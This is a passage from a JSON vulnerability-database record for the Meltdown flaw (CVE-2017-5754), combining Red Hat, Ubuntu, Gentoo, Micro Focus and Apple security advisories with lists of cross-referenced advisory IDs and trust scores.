6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nppc64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\npython-perf-2.6.32-696.18.7.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\npython-perf-2.6.32-696.18.7.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-headers-2.6.32-696.18.7.el6.i686.rpm\nperf-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/speculativeexecution\nhttps://access.redhat.com/security/cve/CVE-2017-5753\nhttps://access.redhat.com/security/cve/CVE-2017-5715\nhttps://access.redhat.com/security/cve/CVE-2017-5754\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFaTXwuXlSAg2UNWIIRAp3LAKCNdSqjVu7zsXcUTnpGuuQAuUlTpwCfTE/O\nOR+iGnoY+cALbsBWKwbmzQM=\n=V4ow\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n==========================================================================\nUbuntu Security Notice USN-3523-1\nJanuary 09, 2018\n\nlinux vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 17.10\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. This flaw is known as Meltdown. \n(CVE-2017-5754)\n\nJann Horn discovered that the Berkeley Packet Filter (BPF) implementation\nin the Linux kernel did not properly check the relationship between pointer\nvalues and the BPF stack. A local attacker could use this to cause a denial\nof service (system crash) or possibly execute arbitrary code. \n(CVE-2017-17863)\n\nJann Horn discovered that the Berkeley Packet Filter (BPF) implementation\nin the Linux kernel improperly performed sign extension in some situations. \nA local attacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2017-16995)\n\nAlexei Starovoitov discovered that the Berkeley Packet Filter (BPF)\nimplementation in the Linux kernel contained a branch-pruning logic issue\naround unreachable code. A local attacker could use this to cause a denial\nof service. (CVE-2017-17862)\n\nJann Horn discovered that the Berkeley Packet Filter (BPF) implementation\nin the Linux kernel mishandled pointer data values in some situations. (CVE-2017-17864)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 17.10:\n  linux-image-4.13.0-25-generic   4.13.0-25.29\n  linux-image-4.13.0-25-lowlatency  4.13.0-25.29\n  linux-image-generic             4.13.0.25.26\n  linux-image-lowlatency          4.13.0.25.26\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 6.5) - x86_64\n\n3. 7) - noarch, x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201810-06\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: Xen: Multiple vulnerabilities\n     Date: October 30, 2018\n     Bugs: #643350, #655188, #655544, #659442\n       ID: 201810-06\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Xen, the worst of which\ncould cause a Denial of Service condition. \n\nBackground\n==========\n\nXen is a bare-metal hypervisor. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  app-emulation/xen          \u003c 4.10.1-r2              \u003e= 4.10.1-r2\n  2  app-emulation/xen-tools    \u003c 4.10.1-r2              \u003e= 4.10.1-r2\n    -------------------------------------------------------------------\n     2 affected packages\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Xen. Please review the\nreferenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Xen users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=app-emulation/xen-4.10.1-r2\"\n\nAll Xen tools users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot -v \"\u003e=app-emulation/xen-tools-4.10.1-r2\"\n\nReferences\n==========\n\n[  1 ] CVE-2017-5715\n       https://nvd.nist.gov/vuln/detail/CVE-2017-5715\n[  2 ] CVE-2017-5753\n       https://nvd.nist.gov/vuln/detail/CVE-2017-5753\n[  3 ] CVE-2017-5754\n       https://nvd.nist.gov/vuln/detail/CVE-2017-5754\n[  4 ] CVE-2018-10471\n       https://nvd.nist.gov/vuln/detail/CVE-2018-10471\n[  5 ] CVE-2018-10472\n       https://nvd.nist.gov/vuln/detail/CVE-2018-10472\n[  6 ] CVE-2018-10981\n       https://nvd.nist.gov/vuln/detail/CVE-2018-10981\n[  7 ] CVE-2018-10982\n       https://nvd.nist.gov/vuln/detail/CVE-2018-10982\n[  8 ] CVE-2018-12891\n       https://nvd.nist.gov/vuln/detail/CVE-2018-12891\n[  9 ] CVE-2018-12892\n       https://nvd.nist.gov/vuln/detail/CVE-2018-12892\n[ 10 ] CVE-2018-12893\n       https://nvd.nist.gov/vuln/detail/CVE-2018-12893\n[ 11 ] CVE-2018-15468\n       https://nvd.nist.gov/vuln/detail/CVE-2018-15468\n[ 12 ] CVE-2018-15469\n       https://nvd.nist.gov/vuln/detail/CVE-2018-15469\n[ 13 ] CVE-2018-15470\n       https://nvd.nist.gov/vuln/detail/CVE-2018-15470\n[ 14 ] CVE-2018-3620\n       https://nvd.nist.gov/vuln/detail/CVE-2018-3620\n[ 15 ] CVE-2018-3646\n       https://nvd.nist.gov/vuln/detail/CVE-2018-3646\n[ 16 ] CVE-2018-5244\n       https://nvd.nist.gov/vuln/detail/CVE-2018-5244\n[ 17 ] CVE-2018-7540\n       https://nvd.nist.gov/vuln/detail/CVE-2018-7540\n[ 18 ] CVE-2018-7541\n       https://nvd.nist.gov/vuln/detail/CVE-2018-7541\n[ 19 ] CVE-2018-7542\n       https://nvd.nist.gov/vuln/detail/CVE-2018-7542\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201810-06\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2018 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://softwaresupport.hpe.com/document/-/facetsearch/document/KM03158629\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: KM03158629\nVersion: 2\n\nMFSBGN03802 - Virtualization Performance Viewer (vPV) / Cloud Optimizer,\nLocal Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2018-05-11\nLast Updated: 2018-05-10\n\nPotential Security Impact: Local: Disclosure of Information\n\nSource: Micro Focus, Product Security Response Team\n\nVULNERABILITY SUMMARY\nA potential vulnerability has been identified in 3rd party component used by\nMicro Focus Virtualization Performance Viewer (vPV) / Cloud Optimizer Virtual\nAppliance. The vulnerability could be exploited to Local Disclosure of\nInformation. \n\nReferences:\n\n  - CVE-2017-5753\n  - CVE-2017-5715\n  - CVE-2017-5754\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n  - HP Virtualization Performance Viewer Software - v2.20, v3.0, v3.01,\nv3.02, v3.03\n  - HPE Cloud Optimizer - v2.20, v3.0, v3.01, v3.02, v3.03\n\nBACKGROUND\n\n  CVSS Base Metrics\n  =================\n  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n\nRESOLUTION\n\nMicro Focus is actively working with its vendors to address any systems-level\nSpectre and Meltdown impacts.However, if you have immediate concerns or\nquestions regarding CentOS and its approach to Spectre or Meltdown, please\ncontact them directly. \n\nHISTORY\n\nVersion:1 (rev.1) - 12 April 2018 Initial release\n\nVersion:2 (rev.2) - 10 May 2018 Vulnerability Summary\n\n\nThird Party Security Patches: Third party security patches that are to be installed on \nsystems running Micro Focus products should be applied in accordance with the customer\u0027s \npatch management policy. \n\nSupport: For issues about implementing the recommendations of this Security Bulletin, contact normal Micro Focus services support channel. \nFor other issues about the content of this Security Bulletin, send e-mail to  cyber-psrt@microfocus.com. \n\nReport: To report a potential security vulnerability for any supported product:\n  Web form: https://www.microfocus.com/support-and-services/report-security\n  Email: security@microfocus.com\n\nSubscribe:\n To initiate receiving subscriptions for future Micro Focus Security Bulletin alerts via Email,  please subscribe here - https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification\n Once you are logged in to the portal, please choose security bulletins under product and document types. \n Please note that you will need to sign in using a Passport account. If you do not have a Passport account yet, you can create one- its free and easy https://cf.passport.softwaregrp.com/hppcf/createuser.do \n\nSecurity Bulletin Archive:\n A list of recently released Security Bulletins is available here: https://softwaresupport.hpe.com/security-vulnerability\n \nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following Micro Focus Security Bulletin. \n\n3P = 3rd Party Software\nGN = Micro Focus General Software\nMU = Multi-Platform Software\n\nSystem management and security procedures must be reviewed frequently to maintain system integrity. \nMicro Focus is continually reviewing and enhancing the security features of software products to provide \ncustomers with current secure solutions. \n\n\"Micro Focus is broadly distributing this Security Bulletin in order to bring to the attention of users of the \naffected Micro Focus products the important security information contained in this Bulletin. Micro Focus recommends \nthat all users determine the applicability of this information to their individual situations and take appropriate action. \nMicro Focus does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, \nMicro Focus will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in \nthis Security Bulletin. To the extent permitted by law, Micro Focus  disclaims  all warranties, either express or \nimplied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\" \n\n\nCopyright 2017 EntIT Software LLC\n\nMicro Focus shall not be liable for technical or editorial errors or omissions contained herein. \nThe information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, \nneither Micro Focus nor its affiliates, subcontractors or suppliers will be liable for incidental, special \nor consequential damages including downtime cost; lost profits; damages relating to the procurement of \nsubstitute products or services; or damages for loss of data, or software restoration. \nThe information in this document is subject to change without notice. Micro Focus and the names of \nMicro Focus products referenced herein are trademarks of Micro Focus in the United States and other countries. \nOther product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2018-1-23-2 macOS High Sierra 10.13.3,\nSecurity Update 2018-001 Sierra,\nand Security Update 2018-001 El Capitan\n\nmacOS High Sierra 10.13.3, Security Update 2018-001 Sierra, and\nSecurity Update 2018-001 El Capitan are now available and address\nthe following:\n\nAudio\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\nImpact: Processing a maliciously crafted audio file may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed through improved\ninput validation. \nCVE-2018-4094: Mingi Cho, MinSik Shin, Seoyoung Kim, Yeongho Lee and\nTaekyoung Kwon of the Information Security Lab, Yonsei University\n\ncurl\nAvailable for: macOS High Sierra 10.13.2\nImpact: Multiple issues in curl\nDescription: An out-of-bounds read issue existed in the curl. This\nissue was addressed through improved bounds checking. \nCVE-2017-8817: found by OSS-Fuzz\n\nIOHIDFamily\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6,\nOS X El Capitan 10.11.6\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of\nGraz University of Technology; Michael Schwarz of Graz University of\nTechnology; Daniel Gruss of Graz University of Technology;\nThomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus\nTechnology GmbH; Stefan Mangard of Graz University of Technology;\nPaul Kocher; Daniel Genkin of University of Pennsylvania and\nUniversity of Maryland; Yuval Yarom of University of Adelaide and\nData61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nKernel\nAvailable for: macOS High Sierra 10.13.2\nImpact: An application may be able to read restricted memory\nDescription: A memory initialization issue was addressed through\nimproved memory handling. \nCVE-2018-4090: Jann Horn of Google Project Zero\n\nKernel\nAvailable for: macOS High Sierra 10.13.2\nImpact: An application may be able to read restricted memory\nDescription: A race condition was addressed through improved locking. \nCVE-2018-4092: an anonymous researcher\n\nKernel\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6,\nOS X El Capitan 10.11.6\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: A memory corruption issue was addressed through improved\ninput validation. \nCVE-2018-4082: Russ Cox of Google\n\nKernel\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A logic issue was addressed with improved validation. \nCVE-2018-4097: Resecurity, Inc. \n\nKernel\nAvailable for: macOS High Sierra 10.13.2\nImpact: An application may be able to read restricted memory\nDescription: A validation issue was addressed with improved input\nsanitization. \nCVE-2018-4093: Jann Horn of Google Project Zero\n\nLinkPresentation\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6.2\nImpact: Processing a maliciously crafted text message may lead to\napplication denial of service\nDescription: A resource exhaustion issue was addressed through\nimproved input validation. \nCVE-2018-4100: Abraham Masri (@cheesecakeufo)\n\nQuartzCore\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6,\nOS X El Capitan 10.11.6\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nweb content. This issue was addressed through improved input\nvalidation. \nCVE-2018-4085: Ret2 Systems Inc. working with Trend Micro\u0027s Zero Day\nInitiative\n\nSandbox\nAvailable for: macOS High Sierra 10.13.2\nImpact: A sandboxed process may be able to circumvent sandbox\nrestrictions\nDescription: An access issue was addressed through additional sandbox\nrestrictions. \nCVE-2018-4091: Alex Gaynor of Mozilla\n\nSecurity\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6\nImpact: A certificate may have name constraints applied incorrectly\nDescription: A certificate evaluation issue existed in the handling\nof name constraints. This issue was addressed through improved trust\nevaluation of certificates. \nCVE-2018-4086: Ian Haken of Netflix\n\nWebKit\nAvailable for: macOS High Sierra 10.13.2\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues were addressed with\nimproved memory handling. \nCVE-2018-4088: Jeonghoon Shin of Theori\nCVE-2018-4089: Ivan Fratric of Google Project Zero\nCVE-2018-4096: found by OSS-Fuzz\n\nWi-Fi\nAvailable for: macOS High Sierra 10.13.2, macOS Sierra 10.12.6,\nOS X El Capitan 10.11.6\nImpact: An application may be able to read restricted memory\nDescription: A validation issue was addressed with improved input\nsanitization. \nCVE-2018-4084: Hyung Sup Lee of Minionz, You Chan Lee of Hanyang\nUniversity\n\nInstallation note:\n\nmacOS High Sierra 10.13.3, Security Update 2018-001 Sierra,\nand Security Update 2018-001 El Capitan may be obtained from the\nMac App Store or Apple\u0027s Software Downloads web site:\nhttps://support.apple.com/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQJdBAEBCgBHFiEEcuX4rtoRe4X62yWlg6PvjDRstEYFAlpnnmApHHByb2R1Y3Qt\nc2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQg6PvjDRstEZaqg/8\nDAjzEHmWMZxkSl88DnX/Y9x39DQ1eV6O0Bsg/WQ2r6wZlRDnBOYdJtgJU0I9MjgT\nJjOj6M/l+YkVS3EJHcdQqAZ6RfSSMvIcRieHJ0Lfj6bfohKRLJxuloFVKar3lAsY\nfIdzqlFKqWvPY6Neto2iR7ZhTWDW7QiVwbgSR1fleEWEglWtTeJjL6mff73Mqexh\n7VngVFIicrbjoFD7uY2dctgkP+no3dcFieyRWF/z8OAmAOIkAc/KMqFyj22DBDq5\nhH1j07Eo0RLKMT+nPq3Vgir5JVVR68M4UvDnSDXGHmTRYaM2BT8osWqlehgFQ52F\nJhqAsJsKP1Mc9WZkly8OvBbZHJcIJryTSqytOOZRQuvg6fXHPOezajcpThTntGiI\n/YcmaFIt8bZ8c0GbQXTMY8YCJEHtG3zb/z+Wf0sABfzbtCt48e5CQD5HDsoZyiML\nJ84Sbs1Lb5XFYsdZg5iUFukIJRqYwaf69BUgMmFPTOxkBL/KH7m4BmUtLeiStLYN\nykdW2TQFEbM6ojPL9HrAyho0wdX2/G4jiemAk22fb/XQ6q9+57RyduE/MDiFW93a\n2XcIzxlsRk37ISIPyEkQTF/L/DTMdnhgI+ZIwmaMwU8Hd48MMMg6MIWYctefvnyB\na1pVFFlwHCfxBWYSVI2fkKwExlNNYXCOjGsN7TSBfNc=\n=pc7O\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-5754"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001001"
      },
      {
        "db": "CERT/CC",
        "id": "VU#584653"
      },
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00303"
      },
      {
        "db": "BID",
        "id": "102378"
      },
      {
        "db": "BID",
        "id": "106128"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113957"
      },
      {
        "db": "PACKETSTORM",
        "id": "147543"
      },
      {
        "db": "PACKETSTORM",
        "id": "145641"
      },
      {
        "db": "PACKETSTORM",
        "id": "145793"
      },
      {
        "db": "PACKETSTORM",
        "id": "146771"
      },
      {
        "db": "PACKETSTORM",
        "id": "145658"
      },
      {
        "db": "PACKETSTORM",
        "id": "145666"
      },
      {
        "db": "PACKETSTORM",
        "id": "150083"
      },
      {
        "db": "PACKETSTORM",
        "id": "147582"
      },
      {
        "db": "PACKETSTORM",
        "id": "146067"
      }
    ],
    "trust": 5.04
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-113957",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-113957"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-5754",
        "trust": 5.6
      },
      {
        "db": "CERT/CC",
        "id": "VU#584653",
        "trust": 3.8
      },
      {
        "db": "BID",
        "id": "102378",
        "trust": 2.0
      },
      {
        "db": "CERT/CC",
        "id": "VU#180049",
        "trust": 1.9
      },
      {
        "db": "BID",
        "id": "106128",
        "trust": 1.4
      },
      {
        "db": "SECTRACK",
        "id": "1040071",
        "trust": 1.1
      },
      {
        "db": "SIEMENS",
        "id": "SSA-608355",
        "trust": 1.1
      },
      {
        "db": "LENOVO",
        "id": "LEN-18282",
        "trust": 1.1
      },
      {
        "db": "CERT@VDE",
        "id": "VDE-2018-003",
        "trust": 1.1
      },
      {
        "db": "CERT@VDE",
        "id": "VDE-2018-002",
        "trust": 1.1
      },
      {
        "db": "JVN",
        "id": "JVNVU93823979",
        "trust": 1.1
      },
      {
        "db": "USCERT",
        "id": "TA18-141A",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU98137233",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU94630516",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU99752892",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-23-075-01",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-23-257-04",
        "trust": 0.8
      },
      {
        "db": "CERT/CC",
        "id": "VU#155143",
        "trust": 0.8
      },
      {
        "db": "ICS CERT ALERT",
        "id": "ICS-ALERT-18-011-01A",
        "trust": 0.8
      },
      {
        "db": "USCERT",
        "id": "TA18-004A",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001001",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00303",
        "trust": 0.6
      },
      {
        "db": "ICS CERT ALERT",
        "id": "ICS-ALERT-18-011-01E",
        "trust": 0.3
      },
      {
        "db": "ICS CERT ALERT",
        "id": "ICS-ALERT-18-011-01C",
        "trust": 0.3
      },
      {
        "db": "JUNIPER",
        "id": "JSA10842",
        "trust": 0.3
      },
      {
        "db": "SIEMENS",
        "id": "SSA-168644",
        "trust": 0.3
      },
      {
        "db": "PACKETSTORM",
        "id": "146067",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "145824",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145794",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145804",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145836",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145796",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145795",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145695",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145811",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145810",
        "trust": 0.1
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-151",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-113957",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147543",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145641",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145793",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146771",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145658",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145666",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "150083",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147582",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CERT/CC",
        "id": "VU#584653"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00303"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113957"
      },
      {
        "db": "BID",
        "id": "102378"
      },
      {
        "db": "BID",
        "id": "106128"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001001"
      },
      {
        "db": "PACKETSTORM",
        "id": "147543"
      },
      {
        "db": "PACKETSTORM",
        "id": "146067"
      },
      {
        "db": "PACKETSTORM",
        "id": "145641"
      },
      {
        "db": "PACKETSTORM",
        "id": "145793"
      },
      {
        "db": "PACKETSTORM",
        "id": "146771"
      },
      {
        "db": "PACKETSTORM",
        "id": "145658"
      },
      {
        "db": "PACKETSTORM",
        "id": "145666"
      },
      {
        "db": "PACKETSTORM",
        "id": "150083"
      },
      {
        "db": "PACKETSTORM",
        "id": "147582"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5754"
      }
    ]
  },
  "id": "VAR-201801-1711",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-00303"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113957"
      }
    ],
